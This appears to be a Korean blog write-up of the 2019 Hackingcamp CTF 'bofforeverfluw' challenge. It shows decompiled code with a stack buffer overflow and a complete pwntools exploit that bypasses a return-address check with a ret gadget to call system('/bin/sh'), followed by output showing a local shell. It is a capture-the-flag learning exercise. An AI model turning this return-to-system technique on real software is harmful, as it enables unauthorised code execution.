[Hackingcamp CTF 2019] bofforeverfluw
2019. 11. 27. 09:58ㆍWargame & CTF/Hackingcamp CTF
Summary
32bit
Analysis
int __cdecl main()
{
char buf; // [esp+0h] [ebp-204h]
int (**retaddr)(const char *); // [esp+208h] [ebp+4h]
system("echo hi");
read(0, &buf, 0x800u);
if ( retaddr == &system )
{
perror("no hack~");
exit(-1);
}
return 0;
}retaddr이 system인지 검사한다. ret으로 우회하면 된다. data영역(0x0804a024)에 /bin/sh라는 문자열이 있다. 이거를 이용하면 된다.
Exploit
from pwn import *
e = ELF("./bofforeverfluw")
p = process("./bofforeverfluw")
pr = 0x0804857b
ret = 0x0804851e
binsh = 0x0804a024
p.recvuntil("hi\n")
payload = ""
payload += "A"*(0x204+0x4)
payload += p32(ret)
payload += p32(e.plt["system"])
payload += p32(pr)
payload += p32(binsh)
p.send(payload)
p.interactive()cg10036@cg10036-virtual-machine:~/CTF/2019/HackingCampCTF/bofforeverfluw$ p ex.py
[*] '/home/cg10036/CTF/2019/HackingCampCTF/bofforeverfluw/bofforeverfluw'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './bofforeverfluw': pid 12419
[*] Switching to interactive mode
$ id
uid=1000(cg10036) gid=1000(cg10036) 그룹들=1000(cg10036),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)